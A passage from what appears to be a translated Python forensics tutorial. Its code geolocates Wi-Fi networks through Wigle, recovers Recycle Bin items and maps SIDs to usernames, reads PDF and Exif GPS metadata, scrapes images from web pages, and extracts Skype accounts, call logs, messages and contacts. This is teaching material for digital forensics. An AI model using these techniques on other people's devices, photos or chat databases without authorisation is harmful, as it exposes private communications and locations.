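<p>This requires the <code class="language-plaintext highlighter-rouge">mechanize</code> library, which lets Python write stateful web programs: after logging in to the Wigle server successfully, it stores and reuses the authentication cookie.</p>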

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">mechanize</span><span class="p">,</span> <span class="n">urllib</span><span class="p">,</span> <span class="n">re</span><span class="p">,</span> <span class="n">urlparse</span>
<span class="k">def</span> <span class="nf">wigle_print</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">,</span> <span class="n">netid</span><span class="p">):</span>
    <span class="n">browser</span> <span class="o">=</span> <span class="n">mechanize</span><span class="p">.</span><span class="n">Browser</span><span class="p">()</span>
    <span class="n">browser</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="s">"http://wigle.net"</span><span class="p">)</span>
    <span class="n">req_data</span> <span class="o">=</span> <span class="n">urllib</span><span class="p">.</span><span class="n">urlencode</span><span class="p">({</span><span class="s">"credential_0"</span><span class="p">:</span> <span class="n">username</span><span class="p">,</span> <span class="s">"credential_1"</span><span class="p">:</span> <span class="n">password</span><span class="p">})</span>
    
    <span class="n">browser</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="s">"https://wigle.net/gps/gps/main/login"</span><span class="p">,</span> <span class="n">req_data</span><span class="p">)</span>
    <span class="n">params</span> <span class="o">=</span> <span class="p">{}</span>
    <span class="n">params</span><span class="p">[</span><span class="s">"netid"</span><span class="p">]</span> <span class="o">=</span> <span class="n">netid</span>
    <span class="n">req_params</span> <span class="o">=</span> <span class="n">urllib</span><span class="p">.</span><span class="n">urlencode</span><span class="p">(</span><span class="n">params</span><span class="p">)</span>
    <span class="n">resp_url</span> <span class="o">=</span> <span class="s">"http://wigle.net/gps/gps/main/confirmquery/"</span>
    <span class="n">resp</span> <span class="o">=</span> <span class="n">browser</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="n">resp_url</span><span class="p">,</span> <span class="n">req_params</span><span class="p">).</span><span class="n">read</span><span class="p">()</span>
    <span class="n">map_lat</span> <span class="o">=</span> <span class="s">"N/A"</span>
    <span class="n">map_lon</span> <span class="o">=</span> <span class="s">"N/A"</span>
    <span class="n">r_lat</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="sa">r</span><span class="s">"maplat=.*\&amp;"</span><span class="p">,</span> <span class="n">resp</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">r_lat</span><span class="p">:</span>
        <span class="n">map_lat</span> <span class="o">=</span> <span class="n">r_lat</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">split</span><span class="p">(</span><span class="s">"&amp;"</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">split</span><span class="p">(</span><span class="s">"="</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span>
    <span class="n">r_lon</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="sa">r</span><span class="s">"maplon=.*\&amp;"</span><span class="p">,</span> <span class="n">resp</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">r_lon</span><span class="p">:</span>
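        <span class="n">map_lon</span> <span class="o">=</span> <span class="n">r_lon</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">split</span><span class="p">(</span><span class="s">"&amp;"</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">split</span><span class="p">(</span><span class="s">"="</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span>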
    <span class="k">print</span><span class="p">(</span><span class="s">"[-] Lat: {}, Lon: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">map_lat</span><span class="p">,</span> <span class="n">map_lon</span><span class="p">))</span>
</code></pre></div></div>
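
<p>The coordinate extraction can be exercised on its own, without logging in to any server. The sketch below is one possible way to do it, assuming the response body contains <code class="language-plaintext highlighter-rouge">maplat=</code> and <code class="language-plaintext highlighter-rouge">maplon=</code> followed by decimal numbers as in the result quoted earlier; the helper name <code class="language-plaintext highlighter-rouge">extract_coords</code> is hypothetical.</p>

```python
import re


def extract_coords(page):
    """Pull the maplat and maplon values out of a response body."""
    lat = re.search(r"maplat=(-?\d+(?:\.\d+)?)", page)
    lon = re.search(r"maplon=(-?\d+(?:\.\d+)?)", page)
    return (lat.group(1) if lat else "N/A", lon.group(1) if lon else "N/A")


# The example result quoted in the text.
sample = "maplat=47.25264359&maplon=-87.25624084"
print("[-] Lat: {}, Lon: {}".format(*extract_coords(sample)))
```

<p>Capturing the number directly means the pattern does not need a trailing separator after the value, so it also works when <code class="language-plaintext highlighter-rouge">maplon</code> is the last parameter in the string.</p>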

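<h2 id="用-python-恢复被删入回收站中的内容">Recovering Deleted Items from the Recycle Bin with Python</h2>

<p>On Windows 98 and earlier Windows systems that use the FAT file system, the Recycle Bin directory is <code class="language-plaintext highlighter-rouge">C:\Recycled\</code>. On operating systems that support NTFS, including Windows NT/2000 and Windows XP, it is the <code class="language-plaintext highlighter-rouge">C:\Recycler\</code> directory. On Windows Vista and Windows 7, the Recycle Bin directory is <code class="language-plaintext highlighter-rouge">C:\$Recycle.Bin</code>.</p>

<h3 id="使用-os-模块寻找被删除的文件文件夹">Finding Deleted Files and Folders with the os Module</h3>

<p>Rather than detecting the operating system and then looking for the matching folder, simply test each candidate folder in turn.</p>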

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">os</span>
<span class="k">def</span> <span class="nf">return_dir</span><span class="p">():</span>
    <span class="n">dirs</span> <span class="o">=</span> <span class="p">[</span><span class="s">"c:/Recycler/"</span><span class="p">,</span> <span class="s">"c:/Recycled/"</span><span class="p">,</span> <span class="s">"C:/$Recycle.Bin/"</span><span class="p">]</span>
    <span class="k">for</span> <span class="n">recycle_dir</span> <span class="ow">in</span> <span class="n">dirs</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">isdir</span><span class="p">(</span><span class="n">recycle_dir</span><span class="p">):</span>
            <span class="k">return</span> <span class="n">recycle_dir</span>
    <span class="k">return</span> <span class="bp">None</span>
</code></pre></div></div>

<p>Once the Recycle Bin directory is found, we inspect its contents. In this example it holds two subdirectories; both contain the string <code class="language-plaintext highlighter-rouge">S-1-5-21-1275210071-1715567821-725345543-</code> and end in 1005 and 500 respectively. This string is the user's SID, which corresponds to a unique user account on the machine.</p>

<h3 id="用-python-把-sid-和用户名关联起来">Mapping SIDs to Usernames with Python</h3>

<p>The Windows registry can translate a SID into an exact username. We inspect the registry key <code class="language-plaintext highlighter-rouge">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\&lt;SID&gt;\ProfileImagePath</code> and see that it returns the value <code class="language-plaintext highlighter-rouge">%SystemDrive%\Documents and Settings\&lt;USERID&gt;</code>. With the <code class="language-plaintext highlighter-rouge">reg query</code> command we can therefore turn a SID into a username directly.</p>
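
<p>Walking the per-user subdirectories needs nothing beyond the <code class="language-plaintext highlighter-rouge">os</code> module. The following is a minimal sketch, assuming each subdirectory of the Recycle Bin is named after a SID; the helper names <code class="language-plaintext highlighter-rouge">list_recycled</code> and <code class="language-plaintext highlighter-rouge">print_recycled</code> are hypothetical.</p>

```python
import os


def list_recycled(recycle_dir):
    """Map each per-user subdirectory (named by SID) to the files it holds."""
    found = {}
    for sid in sorted(os.listdir(recycle_dir)):
        sid_path = os.path.join(recycle_dir, sid)
        if not os.path.isdir(sid_path):
            continue  # skip stray files such as desktop.ini
        try:
            found[sid] = sorted(os.listdir(sid_path))
        except OSError:
            found[sid] = []  # unreadable without sufficient privileges
    return found


def print_recycled(recycle_dir):
    """Print every deleted item, grouped by the SID of its owner."""
    for sid, files in list_recycled(recycle_dir).items():
        print("[*] Listing files for SID: {}".format(sid))
        for name in files:
            print("[+] Found file: {}".format(name))


if __name__ == "__main__":
    candidate = "C:/$Recycle.Bin/"
    if os.path.isdir(candidate):  # only meaningful on Windows
        print_recycled(candidate)
```

<p>Returning a dictionary rather than printing directly keeps the directory walk separate from the output, so the SIDs can later be replaced by usernames before anything is shown.</p>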

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:<span class="se">\R</span>ECYCLER&gt;reg query <span class="s2">"HKEY_LOCAL...."</span> /v ProfileImagePath
</code></pre></div></div>

<p>To do the same in Python, we open the registry, read the ProfileImagePath value, and return the username that follows the last backslash in the user's profile path.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">_winreg</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">sid2user</span><span class="p">(</span><span class="n">sid</span><span class="p">):</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">key</span> <span class="o">=</span> <span class="n">OpenKey</span><span class="p">(</span><span class="n">HKEY_LOCAL_MACHINE</span><span class="p">,</span> <span class="sa">r</span><span class="s">"SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">sid</span><span class="p">))</span>
        <span class="n">value</span><span class="p">,</span> <span class="nb">type</span> <span class="o">=</span> <span class="n">QueryValueEx</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="s">"ProfileImagePath"</span><span class="p">)</span>
        <span class="n">user</span> <span class="o">=</span> <span class="n">value</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">"</span><span class="se">\\</span><span class="s">"</span><span class="p">)[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
        <span class="k">return</span> <span class="n">user</span>
    <span class="k">except</span><span class="p">:</span>
        <span class="k">return</span> <span class="n">sid</span>
</code></pre></div></div>
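
<p>The username extraction step can be tried without a Windows registry at hand. The sketch below is one possible way to do it with the standard <code class="language-plaintext highlighter-rouge">ntpath</code> module, which applies Windows path rules on any platform. The function name <code class="language-plaintext highlighter-rouge">profile_path_to_user</code> and the sample account name are assumptions made for illustration.</p>

```python
import ntpath


def profile_path_to_user(profile_image_path):
    """Return the last component of a Windows profile path."""
    # Strip a trailing separator first, so "C:\\Users\\bob\\" still yields "bob".
    return ntpath.basename(profile_image_path.rstrip("\\/"))


# "alice" is a made-up account name used only for this example.
print(profile_path_to_user(r"%SystemDrive%\Documents and Settings\alice"))
```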

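<h2 id="元数据">Metadata</h2>

<p>Metadata is information stored in a file that is not plainly visible. It can be found in documents, spreadsheets, images, audio files, and video files. The application that created the file may record details such as the document's author, creation and modification times, possible revisions, and comments.</p>

<h3 id="使用-pypdf-解析-pdf-文件中的元数据">Parsing PDF Metadata with PyPDF</h3>

<p>PyPDF can extract the contents of a document, and can also split, merge, copy, encrypt, and decrypt documents. To extract metadata, call the <code class="language-plaintext highlighter-rouge">.getDocumentInfo()</code> method. It returns a dictionary-like object that maps each metadata field name to its value. Iterating over this object yields the field names, so a simple loop prints all of the PDF document's metadata.</p>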

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">pyPdf</span>
<span class="kn">from</span> <span class="nn">pyPdf</span> <span class="kn">import</span> <span class="n">PdfFileReader</span>
<span class="k">def</span> <span class="nf">print_meta</span><span class="p">(</span><span class="n">file_name</span><span class="p">):</span>
    <span class="n">pdf_file</span> <span class="o">=</span> <span class="n">PdfFileReader</span><span class="p">(</span><span class="nb">open</span><span class="p">(</span><span class="n">file_name</span><span class="p">,</span> <span class="s">"rb"</span><span class="p">))</span>
    <span class="n">doc_info</span> <span class="o">=</span> <span class="n">pdf_file</span><span class="p">.</span><span class="n">getDocumentInfo</span><span class="p">()</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[*] PDF MetaData For: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">file_name</span><span class="p">))</span>
    <span class="k">for</span> <span class="n">meta_item</span> <span class="ow">in</span> <span class="n">doc_info</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] {}:{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">meta_item</span><span class="p">,</span> <span class="n">doc_info</span><span class="p">[</span><span class="n">meta_item</span><span class="p">]))</span>
</code></pre></div></div>
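
<p>Creation and modification times in PDF metadata are usually stored as strings such as <code class="language-plaintext highlighter-rouge">D:20101210031827-08'00'</code>. The sketch below shows one way to turn such a string into a <code class="language-plaintext highlighter-rouge">datetime</code> using only the standard library. The helper <code class="language-plaintext highlighter-rouge">parse_pdf_date</code> is hypothetical and not part of PyPDF, and it assumes the common <code class="language-plaintext highlighter-rouge">D:YYYYMMDDHHmmSS</code> layout with an optional UTC offset.</p>

```python
import re
from datetime import datetime, timedelta, timezone

# D:YYYYMMDDHHmmSS followed by an optional offset such as -08'00' or Z.
_PDF_DATE = re.compile(
    r"^D:(\d{4})(\d{2})?(\d{2})?(\d{2})?(\d{2})?(\d{2})?"
    r"(?:([+\-Z])(?:(\d{2})'?(\d{2})?'?)?)?$"
)


def parse_pdf_date(text):
    """Parse a PDF date string; return None if it does not match."""
    match = _PDF_DATE.match(text.strip())
    if match is None:
        return None
    year, month, day, hour, minute, second, sign, off_h, off_m = match.groups()
    tz = None
    if sign == "Z":
        tz = timezone.utc
    elif sign in ("+", "-"):
        delta = timedelta(hours=int(off_h or 0), minutes=int(off_m or 0))
        tz = timezone(delta if sign == "+" else -delta)
    # Missing fields default to the start of the period (January, day 1, 00:00:00).
    return datetime(int(year), int(month or 1), int(day or 1),
                    int(hour or 0), int(minute or 0), int(second or 0),
                    tzinfo=tz)


print(parse_pdf_date("D:20101210031827-08'00'"))
```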

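<h3 id="理解-exif-元数据">Understanding Exif Metadata</h3>

<p>The Exif (Exchangeable image file format) standard specifies how image and audio files are stored.</p>

<p>The Exif standard defines a number of tags that are very useful in forensic investigations, and the <code class="language-plaintext highlighter-rouge">exiftool</code> utility can parse them.</p>

<h3 id="用-beautifulsoup-下载图片">Downloading Images with BeautifulSoup</h3>

<p>BeautifulSoup makes it quick to parse HTML and XML documents.</p>

<p>The following code finds every img tag on a page and downloads the images:</p>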

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">urllib2</span>
<span class="kn">from</span> <span class="nn">bs4</span> <span class="kn">import</span> <span class="n">BeautifulSoup</span>
<span class="kn">from</span> <span class="nn">urlparse</span> <span class="kn">import</span> <span class="n">urlsplit</span>
<span class="kn">from</span> <span class="nn">os.path</span> <span class="kn">import</span> <span class="n">basename</span>

<span class="k">def</span> <span class="nf">find_images</span><span class="p">(</span><span class="n">url</span><span class="p">):</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Finding images on {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">url</span><span class="p">))</span>
    <span class="n">url_content</span> <span class="o">=</span> <span class="n">urllib2</span><span class="p">.</span><span class="n">urlopen</span><span class="p">(</span><span class="n">url</span><span class="p">).</span><span class="n">read</span><span class="p">()</span>
    <span class="n">soup</span> <span class="o">=</span> <span class="n">BeautifulSoup</span><span class="p">(</span><span class="n">url_content</span><span class="p">)</span>
    <span class="n">img_tags</span> <span class="o">=</span> <span class="n">soup</span><span class="p">.</span><span class="n">findAll</span><span class="p">(</span><span class="s">"img"</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">img_tags</span>

<span class="k">def</span> <span class="nf">download_image</span><span class="p">(</span><span class="n">img_tag</span><span class="p">):</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Downloading image..."</span><span class="p">)</span>
        <span class="n">img_src</span> <span class="o">=</span> <span class="n">img_tag</span><span class="p">[</span><span class="s">"src"</span><span class="p">]</span>
        <span class="n">img_content</span> <span class="o">=</span> <span class="n">urllib2</span><span class="p">.</span><span class="n">urlopen</span><span class="p">(</span><span class="n">img_src</span><span class="p">).</span><span class="n">read</span><span class="p">()</span>
        <span class="n">img_file_name</span> <span class="o">=</span> <span class="n">basename</span><span class="p">(</span><span class="n">urlsplit</span><span class="p">(</span><span class="n">img_src</span><span class="p">)[</span><span class="mi">2</span><span class="p">])</span>
        <span class="n">img_file</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">img_file_name</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span>
        <span class="n">img_file</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">img_content</span><span class="p">)</span>
        <span class="n">img_file</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
        <span class="k">return</span> <span class="n">img_file_name</span>
    <span class="k">except</span><span class="p">:</span>
        <span class="k">return</span> <span class="s">""</span>
</code></pre></div></div>
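
<p>The download code above passes the <code class="language-plaintext highlighter-rouge">src</code> attribute straight to <code class="language-plaintext highlighter-rouge">urlopen</code>, which only works when the attribute is an absolute URL. The sketch below shows one way to resolve relative paths against the page URL first. It uses Python 3's <code class="language-plaintext highlighter-rouge">urllib.parse</code> rather than the Python 2 modules used above, and the function name <code class="language-plaintext highlighter-rouge">resolve_image</code> and the example URLs are assumptions.</p>

```python
from os.path import basename
from urllib.parse import urljoin, urlsplit


def resolve_image(page_url, img_src):
    """Return (absolute_url, local_file_name) for an img src attribute."""
    # urljoin leaves absolute URLs untouched and resolves relative ones
    # against the URL of the page they were found on.
    absolute_url = urljoin(page_url, img_src)
    file_name = basename(urlsplit(absolute_url).path)
    return absolute_url, file_name


print(resolve_image("http://example.com/gallery/index.html", "../img/cat.jpg"))
```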

<h3 id="用-python-的图像处理库读取图片中的-exif-元数据">Reading Exif Metadata from Images with the Python Imaging Library</h3>

<p>Extracting GPS metadata with the PIL library:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">PIL</span> <span class="kn">import</span> <span class="n">Image</span>
<span class="kn">from</span> <span class="nn">PIL.ExifTags</span> <span class="kn">import</span>  <span class="n">TAGS</span>

<span class="k">def</span> <span class="nf">test_for_exif</span><span class="p">(</span><span class="n">image_file_name</span><span class="p">):</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">exif_data</span> <span class="o">=</span> <span class="p">{}</span>
        <span class="n">img_file</span> <span class="o">=</span> <span class="n">Image</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="n">image_file_name</span><span class="p">)</span>
        <span class="n">info</span> <span class="o">=</span> <span class="n">img_file</span><span class="p">.</span><span class="n">_getexif</span><span class="p">()</span>
        <span class="k">if</span> <span class="n">info</span><span class="p">:</span>
            <span class="k">for</span> <span class="n">tag</span><span class="p">,</span> <span class="n">value</span> <span class="ow">in</span> <span class="n">info</span><span class="p">.</span><span class="n">items</span><span class="p">():</span>
                <span class="n">decoded</span> <span class="o">=</span> <span class="n">TAGS</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="n">tag</span><span class="p">,</span> <span class="n">tag</span><span class="p">)</span>
                <span class="n">exif_data</span><span class="p">[</span><span class="n">decoded</span><span class="p">]</span> <span class="o">=</span> <span class="n">value</span>
            <span class="n">exif_gps</span> <span class="o">=</span> <span class="n">exif_data</span><span class="p">[</span><span class="s">"GPSInfo"</span><span class="p">]</span>
            <span class="k">if</span> <span class="n">exif_gps</span><span class="p">:</span>
                <span class="k">print</span><span class="p">(</span><span class="s">"[*] {} contains GPS MetaData"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">image_file_name</span><span class="p">))</span>
    <span class="k">except</span><span class="p">:</span>
        <span class="k">pass</span>
</code></pre></div></div>
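
<p>Exif stores each GPS coordinate as degrees, minutes, and seconds plus a hemisphere reference (N/S or E/W). The sketch below shows how such a value could be converted to decimal degrees for plotting on a map. The function <code class="language-plaintext highlighter-rouge">dms_to_decimal</code> is hypothetical, and it assumes the three parts have already been read as values that <code class="language-plaintext highlighter-rouge">float()</code> accepts. Older PIL releases return (numerator, denominator) pairs, which would need dividing first.</p>

```python
def dms_to_decimal(dms, ref):
    """Convert (degrees, minutes, seconds) plus a hemisphere letter to decimal degrees."""
    degrees, minutes, seconds = (float(part) for part in dms)
    decimal = degrees + minutes / 60.0 + seconds / 3600.0
    # Southern latitudes and western longitudes are negative.
    if ref in ("S", "W"):
        decimal = -decimal
    return decimal


# Example coordinates chosen only for illustration.
latitude = dms_to_decimal((40, 26, 46), "N")
longitude = dms_to_decimal((79, 58, 56), "W")
print(round(latitude, 6), round(longitude, 6))
```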

<h2 id="用-python-分析应用程序的使用记录">Analyzing Application Usage Records with Python</h2>

<h3 id="理解-skype-中的-sqlite3-数据库">Understanding the Skype SQLite3 Database</h3>

<p>On Windows, Skype stores a database named <code class="language-plaintext highlighter-rouge">main.db</code> in the <code class="language-plaintext highlighter-rouge">C:\Documents and Settings\&lt;User&gt;\Application Data\Skype\&lt;Skype-account&gt;</code> directory. On macOS, the database lives in <code class="language-plaintext highlighter-rouge">/Users/&lt;User&gt;/Library/Application Support/Skype/&lt;Skype-account&gt;</code>.</p>

<p>After connecting to the SQLite3 database, run <code class="language-plaintext highlighter-rouge">SELECT tbl_name FROM sqlite_master WHERE type=='table'</code> to list its tables. Every SQLite database maintains a table named <code class="language-plaintext highlighter-rouge">sqlite_master</code>, and its <code class="language-plaintext highlighter-rouge">tbl_name</code> column names each table in the database.</p>

<p>The Accounts table records information about the user account that uses the application. Its columns hold the username, the Skype display name, the user's location, the account creation date, and similar details.</p>

<p>The database stores the account creation time as a UNIX timestamp. The SQL function <code class="language-plaintext highlighter-rouge">datetime()</code> converts this value into a more readable format.</p>
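
<p>Both ideas can be tried on a throwaway in-memory database before touching a real <code class="language-plaintext highlighter-rouge">main.db</code>. In the sketch below, the two-column <code class="language-plaintext highlighter-rouge">Accounts</code> table and its single row are made up for the demonstration. Only the <code class="language-plaintext highlighter-rouge">sqlite_master</code> query and the <code class="language-plaintext highlighter-rouge">datetime(..., 'unixepoch')</code> conversion mirror the text.</p>

```python
import sqlite3

conn = sqlite3.connect(":memory:")
# A hypothetical, heavily reduced stand-in for Skype's Accounts table.
conn.execute("CREATE TABLE Accounts (skypename TEXT, profile_timestamp INTEGER)")
conn.execute("INSERT INTO Accounts VALUES ('demo_user', 1262304000)")

# List every table recorded in sqlite_master.
tables = [row[0] for row in conn.execute(
    "SELECT tbl_name FROM sqlite_master WHERE type = 'table'")]
print(tables)

# Convert the UNIX timestamp into a readable UTC date.
created = conn.execute(
    "SELECT datetime(profile_timestamp, 'unixepoch') FROM Accounts").fetchone()[0]
print(created)
conn.close()
```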

<h3 id="使用-python-和-sqlite3-自动查询-skype-的数据库">Automating Skype Database Queries with Python and SQLite3</h3>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">sqlite3</span>
<span class="k">def</span> <span class="nf">print_profile</span><span class="p">(</span><span class="n">skype_db</span><span class="p">):</span>
    <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">connect</span><span class="p">(</span><span class="n">skype_db</span><span class="p">)</span>
    <span class="n">c</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">cursor</span><span class="p">()</span>
    <span class="n">c</span><span class="p">.</span><span class="n">execute</span><span class="p">(</span><span class="s">"SELECT fullname, skypename, city, country, datetime(profile_timestamp, 'unixepoch') FROM Accounts;"</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">row</span> <span class="ow">in</span> <span class="n">c</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[*] -- Found Account --"</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] User: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Skype Username: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">1</span><span class="p">]))</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Location: {},{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="n">row</span><span class="p">[</span><span class="mi">3</span><span class="p">]))</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Profile Date: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">4</span><span class="p">]))</span>
</code></pre></div></div>

<p>Querying across multiple tables:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">print_call_log</span><span class="p">(</span><span class="n">skype_db</span><span class="p">):</span>
    <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">connect</span><span class="p">(</span><span class="n">skype_db</span><span class="p">)</span>
    <span class="n">c</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">cursor</span><span class="p">()</span>
    <span class="n">c</span><span class="p">.</span><span class="n">execute</span><span class="p">(</span><span class="s">"SELECT datetime(begin_timestamp, 'unixepoch'), identity FROM calls, conversations WHERE calls.conv_dbid = conversations.id;"</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[*] -- Found Calls --"</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">row</span> <span class="ow">in</span> <span class="n">c</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Time: {} | partner: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">row</span><span class="p">[</span><span class="mi">1</span><span class="p">]))</span>
</code></pre></div></div>

<p>Skype keeps every sent and received message in the database, in a table named <code class="language-plaintext highlighter-rouge">Messages</code>. A SELECT statement pulls timestamp, <code class="language-plaintext highlighter-rouge">dialog_partner</code>, author, and <code class="language-plaintext highlighter-rouge">body_xml</code> from this table. Note that if the <code class="language-plaintext highlighter-rouge">dialog_partner</code> and author fields differ, the owner of the database sent the message to <code class="language-plaintext highlighter-rouge">dialog_partner</code>. If the two fields are the same, <code class="language-plaintext highlighter-rouge">dialog_partner</code> sent the message, and the output is prefixed with <code class="language-plaintext highlighter-rouge">from</code>.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">print_messages</span><span class="p">(</span><span class="n">skype_db</span><span class="p">):</span>
    <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">connect</span><span class="p">(</span><span class="n">skype_db</span><span class="p">)</span>
    <span class="n">c</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">cursor</span><span class="p">()</span>
    <span class="n">c</span><span class="p">.</span><span class="n">execute</span><span class="p">(</span><span class="s">"SELECT datetime(timestamp, 'unixepoch'), dialog_partner, author, body_xml FROM Messages;"</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[*] -- Found Messages --"</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">row</span> <span class="ow">in</span> <span class="n">c</span><span class="p">:</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="k">if</span> <span class="s">"partlist"</span> <span class="ow">not</span> <span class="ow">in</span> <span class="nb">str</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">3</span><span class="p">]):</span>
                <span class="k">if</span> <span class="nb">str</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span> <span class="o">!=</span> <span class="nb">str</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">2</span><span class="p">]):</span>
                    <span class="n">msg_direction</span> <span class="o">=</span> <span class="s">"To {}: "</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span>
                <span class="k">else</span><span class="p">:</span>
                    <span class="n">msg_direction</span> <span class="o">=</span> <span class="s">"From {}: "</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span>
                <span class="k">print</span><span class="p">(</span><span class="s">"Time: {} {} {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">msg_direction</span><span class="p">,</span> <span class="n">row</span><span class="p">[</span><span class="mi">3</span><span class="p">]))</span>
        <span class="k">except</span><span class="p">:</span>
            <span class="k">pass</span>
</code></pre></div></div>
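
<p>The direction rule is easy to check in isolation. The sketch below pulls it out into a small function so it can be tested without a database. The name <code class="language-plaintext highlighter-rouge">message_direction</code> and the sample account names are assumptions.</p>

```python
def message_direction(dialog_partner, author):
    """Return the prefix describing who sent a message."""
    # Different fields: the database owner wrote to dialog_partner.
    if dialog_partner != author:
        return "To {}: ".format(dialog_partner)
    # Same fields: dialog_partner is the author of the message.
    return "From {}: ".format(author)


print(message_direction("alice", "owner"))
print(message_direction("alice", "alice"))
```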

<h3 id="其他有用的一些-skype-查询语句">Other Useful Skype Queries</h3>

<p>To print only the contacts whose birthday is set:</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SELECT</span> <span class="n">fullname</span><span class="p">,</span> <span class="n">birthday</span> <span class="k">FROM</span> <span class="n">contacts</span> <span class="k">WHERE</span> <span class="n">birthday</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">;</span>	
</code></pre></div></div>

